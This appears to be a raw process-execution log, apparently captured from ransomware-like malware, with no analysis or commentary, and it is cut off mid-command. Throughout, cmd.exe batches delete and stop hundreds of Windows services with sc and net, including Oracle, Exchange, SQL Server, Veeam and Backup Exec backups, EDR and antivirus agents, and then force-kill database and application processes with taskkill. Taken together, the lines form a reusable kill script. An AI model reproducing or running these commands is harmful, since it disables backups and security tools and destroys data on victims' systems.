sc.exe sc delete OracleJobSchedulerORCL
12920 -
sc.exe sc delete OracleMTSRecoveryService
12656
-
-
cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
7996-
sc.exe sc delete OracleOraDb11g_home1ClrAgent
7232 -
sc.exe sc delete OracleOraDb11g_home1TNSListener
8176 -
sc.exe sc delete OracleVssWriterORCL
7592 -
sc.exe sc delete OracleServiceORCL
8676 -
sc.exe sc delete aspnet_state @sc delete Redis
8272 -
sc.exe sc delete OracleVssWriterORCL
2424 -
sc.exe sc delete JhTask
1460 -
sc.exe sc delete ImeDictUpdateService
7324 -
sc.exe sc delete XT800Service_Personal
9616 -
sc.exe sc delete MCService
10128 -
sc.exe sc delete ImeDictUpdateService
9500 -
sc.exe sc delete allpass_redisservice_port21160
10108 -
sc.exe sc delete "Flash Helper Service"
9956 -
sc.exe sc delete "Kiwi Syslog Server"
9716 -
sc.exe sc delete "UWS HiPriv Services"
9652
-
-
cmd.exe cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
8124-
sc.exe sc delete "UWS LoPriv Services"
7360 -
sc.exe sc delete ftnlsv3
7452 -
sc.exe sc delete ftnlses3
7364 -
sc.exe sc delete FxService
8836 -
sc.exe sc delete "UtilDev Web Server Pro"
9112 -
sc.exe sc delete ftusbrdwks
9092 -
sc.exe sc delete ftusbrdsrv
8896 -
sc.exe sc delete "ZTE USBIP Client Guard"
9580 -
sc.exe sc delete "ZTE USBIP Client"
10000 -
sc.exe sc delete "ZTE FileTranS"
9084 -
sc.exe sc delete wwbizsrv
9448 -
sc.exe sc delete qemu-ga
9304 -
sc.exe sc delete AlibabaProtect
7708 -
sc.exe sc delete ZTEVdservice
9056 -
sc.exe sc delete kbasesrv
10056 -
sc.exe sc delete MMRHookService
10576 -
sc.exe sc delete OracleJobSchedulerORCL
11020 -
sc.exe sc delete IpOverUsbSvc
10344 -
sc.exe sc delete MsDtsServer100
11152 -
sc.exe sc delete KuaiYunTools
10680 -
sc.exe sc delete KMSELDI
9984 -
sc.exe sc delete btPanel
10232 -
sc.exe sc delete Protect_2345Explorer
11284 -
sc.exe sc delete 2345PicSvc
11612 -
sc.exe sc delete vmware-converter-agent
12080 -
sc.exe sc delete vmware-converter-server
11476 -
sc.exe sc delete vmware-converter-worker
10624 -
sc.exe sc delete QQCertificateService
11896 -
sc.exe sc delete OracleRemExecService
11292 -
sc.exe sc delete GPSDaemon
11312 -
sc.exe sc delete GPSUserSvr
12332 -
sc.exe sc delete GPSDownSvr
12744 -
sc.exe sc delete GPSStorageSvr
13272 -
sc.exe sc delete GPSDataProcSvr
12620 -
sc.exe sc delete GPSGatewaySvr
12444 -
sc.exe sc delete GPSMediaSvr
12476 -
sc.exe sc delete GPSLoginSvr
12940 -
sc.exe sc delete GPSTomcat6
12584 -
sc.exe sc delete GPSMysqld
13224 -
sc.exe sc delete GPSFtpd
13164 -
sc.exe sc delete "Zabbix Agent"
13344 -
sc.exe sc delete BackupExecAgentAccelerator
13648 -
sc.exe sc delete bedbg
14100 -
sc.exe sc delete BackupExecDeviceMediaService
13452 -
sc.exe sc delete BackupExecRPCService
13728 -
sc.exe sc delete BackupExecAgentBrowser
12348 -
sc.exe sc delete BackupExecJobEngine
13968 -
sc.exe sc delete BackupExecManagementService
13360 -
sc.exe sc delete MDM
2588 -
sc.exe sc delete TxQBService
13792 -
sc.exe sc delete Gailun_Downloader
14436 -
sc.exe sc delete RemoteAssistService
14728 -
sc.exe sc delete YunService
14952 -
sc.exe sc delete Serv-U
14516 -
sc.exe sc delete "EasyFZS Server"
14936 -
sc.exe sc delete "Rpc Monitor"
14640 -
sc.exe sc delete OpenFastAssist
14620 -
sc.exe sc delete "Nuo Update Monitor"
14116 -
sc.exe sc delete "Daemon Service"
15280 -
sc.exe sc delete asComSvc
15244 -
sc.exe sc delete OfficeUpdateService
14864
-
-
cmd.exe cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
7208-
sc.exe sc delete MSCRMAsyncService
7752 -
sc.exe sc delete REPLICA
7488 -
sc.exe sc delete RTCATS
7504 -
sc.exe sc delete RTCAVMCU
8632 -
sc.exe sc delete RtcQms
8316 -
sc.exe sc delete RTCMEETINGMCU
9160 -
sc.exe sc delete RTCIMMCU
9020 -
sc.exe sc delete RTCDATAMCU
9468 -
sc.exe sc delete RTCCDR
10032 -
sc.exe sc delete ProjectEventService16
9608 -
sc.exe sc delete ProjectQueueService16
9416 -
sc.exe sc delete SPAdminV4
8360 -
sc.exe sc delete SPSearchHostController
9888 -
sc.exe sc delete SPTimerV4
10452 -
sc.exe sc delete SPTraceV4
10856 -
sc.exe sc delete OSearch16
11184 -
sc.exe sc delete ProjectCalcService16
10868 -
sc.exe sc delete c2wts
7180 -
sc.exe sc delete AppFabricCachingService
11028 -
sc.exe sc delete ADWS
10500 -
sc.exe sc delete MotionBoard57
10244 -
sc.exe sc delete MotionBoardRCService57
11248 -
sc.exe sc delete vsvnjobsvc
11444 -
sc.exe sc delete VisualSVNServer
11880 -
sc.exe sc delete "FlexNet Licensing Service 64"
12256 -
sc.exe sc delete BestSyncSvc
11552 -
sc.exe sc delete LPManager
11668 -
sc.exe sc delete MediatekRegistryWriter
11488 -
sc.exe sc delete RaAutoInstSrv_RT2870
11088 -
sc.exe sc delete CobianBackup10
12048 -
sc.exe sc delete SQLANYs_sem5
12420 -
sc.exe sc delete CASLicenceServer
12640 -
sc.exe sc delete SQLService
12908 -
sc.exe sc delete semwebsrv
12308 -
sc.exe sc delete TbossSystem
12848 -
sc.exe sc delete ErpEnvSvc
13172 -
sc.exe sc delete Mysoft.Autoupgrade.DispatchService
13072 -
sc.exe sc delete Mysoft.Autoupgrade.UpdateService
13080 -
sc.exe sc delete Mysoft.Config.WindowsService
11744 -
sc.exe sc delete Mysoft.DataCenterService
12396 -
sc.exe sc delete Mysoft.SchedulingService
13476 -
sc.exe sc delete Mysoft.Setup.InstallService
13904 -
sc.exe sc delete MysoftUpdate
14200 -
sc.exe sc delete edr_monitor
13308 -
sc.exe sc delete abs_deployer
13368 -
sc.exe sc delete savsvc
14168 -
sc.exe sc delete ShareBoxMonitorService
13908 -
sc.exe sc delete ShareBoxService
13628 -
sc.exe sc delete CloudExchangeService
12972 -
sc.exe sc delete "U8WorkerService2"
13580 -
sc.exe sc delete CIS
14376 -
sc.exe sc delete EASService
14596 -
sc.exe sc delete KICkSvr
14868 -
sc.exe sc delete "OSP Service"
15148 -
sc.exe sc delete U8SmsSrv
14588 -
sc.exe sc delete OfficeClearCache
15060 -
sc.exe sc delete TurboCRM70
15316 -
sc.exe sc delete U8DispatchService
15296 -
sc.exe sc delete U8EISService
14984 -
sc.exe sc delete U8EncryptService
14872 -
sc.exe sc delete U8GCService
14956 -
sc.exe sc delete U8KeyManagePool
15440
-
-
cmd.exe cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
7500-
-
net1.exe C:\Windows\system32\net1 stop U8WorkerService1
8040
-
-
-
net1.exe C:\Windows\system32\net1 stop U8WorkerService2
8208
-
-
-
net1.exe C:\Windows\system32\net1 stop "memcached Server"
8488
-
-
-
net1.exe C:\Windows\system32\net1 stop Apache2.4
9744
-
-
-
net1.exe C:\Windows\system32\net1 stop UFIDAWebService
9788
-
-
-
net1.exe C:\Windows\system32\net1 stop MSComplianceAudit
8924
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeADTopology
10472
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
10252
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeCompliance
10640
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDagMgmt
10800
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDelivery
288
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeDiagnostics
11844
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeEdgeSync
11408
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeFastSearch
12236
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
11344
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeHM
12824
-
-
-
net1.exe C:\Windows\system32\net1 stop MSSQL$SQL2008
12660
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeHMRecovery
13228
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeImap4
13108
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIMAP4BE
12820
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeIS
14012
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
500
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxReplication
13488
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
14280
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangePop3
14000
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangePOP3BE
14676
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeRepl
14244
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeRPC
14592
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeServiceHost
15320
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeSubmission
15328
-
-
-
net1.exe C:\Windows\system32\net1 stop MSExchangeThrottling
15396
-
-
-
cmd.exe cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
7608-
-
net1.exe C:\Windows\system32\net1 stop HaoZipSvc
8260
-
-
-
net1.exe C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
7968
-
-
-
net1.exe C:\Windows\system32\net1 stop Realtek11nSU
8768
-
-
-
net1.exe C:\Windows\system32\net1 stop xenlite
10052
-
-
-
net1.exe C:\Windows\system32\net1 stop XenSvc
8884
-
-
-
net1.exe C:\Windows\system32\net1 stop Apache2.2
8344
-
-
-
net1.exe C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
10548
-
-
-
net1.exe C:\Windows\system32\net1 stop DellDRLogSvc
11224
-
-
-
net1.exe C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
10312
-
-
-
net1.exe C:\Windows\system32\net1 stop JWEM3DBAUTORun
11240
-
-
-
net1.exe C:\Windows\system32\net1 stop JWRinfoClientService
10608
-
-
-
net1.exe C:\Windows\system32\net1 stop JWService
11648
-
-
-
net1.exe C:\Windows\system32\net1 stop Service2
11580
-
-
-
net1.exe C:\Windows\system32\net1 stop RapidRecoveryAgent
11544
-
-
-
net1.exe C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
11848
-
-
-
net1.exe C:\Windows\system32\net1 stop AdobeARMservice
12384
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc
12292
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeanBackupSvc
13116
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc
11720
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1300
12600
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1300
13412
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
14052
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdWebService1300
12484
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc
11756
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc
11496
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc
13924
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamMountSvc
14772
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc
14396
-
-
-
net1.exe C:\Windows\system32\net1 stop VeeamDistributionSvc
14284
-
-
-
net1.exe C:\Windows\system32\net1 stop tmlisten
14452
-
-
-
net1.exe C:\Windows\system32\net1 stop ServiceMid
12968
-
-
-
cmd.exe cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
8088-
-
net1.exe C:\Windows\system32\net1 stop UIODetect
8484
-
-
-
net1.exe C:\Windows\system32\net1 stop VMwareHostd
8920
-
-
-
net1.exe C:\Windows\system32\net1 stop TeamViewer8
8412
-
-
-
net1.exe C:\Windows\system32\net1 stop VMUSBArbService
9792
-
-
-
net1.exe C:\Windows\system32\net1 stop VMAuthdService
9672
-
-
-
net1.exe C:\Windows\system32\net1 stop wanxiao-monitor
8892
-
-
-
net1.exe C:\Windows\system32\net1 stop WebAttendServer
10068
-
-
-
net1.exe C:\Windows\system32\net1 stop mysqltransport
10876
-
-
-
net1.exe C:\Windows\system32\net1 stop VMnetDHCP
9504
-
-
-
net1.exe C:\Windows\system32\net1 stop "VMware NAT Service"
11008
-
-
-
net1.exe C:\Windows\system32\net1 stop Tomcat8
2528
-
-
-
net1.exe C:\Windows\system32\net1 stop TeamViewer
11760
-
-
-
net1.exe C:\Windows\system32\net1 stop QPCore
11536
-
-
-
net1.exe C:\Windows\system32\net1 stop CASLicenceServer
1272
-
-
-
net1.exe C:\Windows\system32\net1 stop CASWebServer
11328
-
-
-
net1.exe C:\Windows\system32\net1 stop AutoUpdateService
12340
-
-
-
net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
13012
-
-
-
net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
12956
-
-
-
net1.exe C:\Windows\system32\net1 stop "AliyunService"
2360
-
-
-
net1.exe C:\Windows\system32\net1 stop CASXMLService
13264
-
-
-
net1.exe C:\Windows\system32\net1 stop AGSService
13092
-
-
-
net1.exe C:\Windows\system32\net1 stop RapService
13964
-
-
-
net1.exe C:\Windows\system32\net1 stop DDNSService
13420
-
-
-
net1.exe C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
14268
-
-
-
net1.exe C:\Windows\system32\net1 stop CASVirtualDiskService
14028
-
-
-
net1.exe C:\Windows\system32\net1 stop CASMsgSrv
14204
-
-
-
net1.exe C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
14340
-
-
-
net1.exe C:\Windows\system32\net1 stop OracleDBConsoleilas
14916
-
-
-
net1.exe C:\Windows\system32\net1 stop MySQL
14652
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1220
15228
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1220
3040
-
-
-
net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
13872
-
-
net.exe net stop K3MobileServiceManage
15376
-
-
cmd.exe cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
7196-
taskkill.exe taskkill /IM sqlservr.exe /F
8152 -
taskkill.exe taskkill /IM httpd.exe /F
9140 -
taskkill.exe taskkill /IM java.exe /F
10136 -
taskkill.exe taskkill /IM fdhost.exe /F
8868 -
taskkill.exe taskkill /IM fdlauncher.exe /F
11252 -
taskkill.exe taskkill /IM reportingservicesservice.exe /F
10528 -
taskkill.exe taskkill /IM softmgrlite.exe /F
11796 -
taskkill.exe taskkill /IM sqlbrowser.exe /F
11696 -
taskkill.exe taskkill /IM ssms.exe /F
13192 -
taskkill.exe taskkill /IM vmtoolsd.exe /F
12852 -
taskkill.exe taskkill /IM baidunetdisk.exe /F
13596 -
taskkill.exe taskkill /IM yundetectservice.exe /F
13804 -
taskkill.exe taskkill /IM ssclient.exe /F
13100 -
taskkill.exe taskkill /IM GNAupdaemon.exe /F
15276 -
taskkill.exe taskkill /IM RAVCp164.exe /F
14504
-
-
cmd.exe cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & 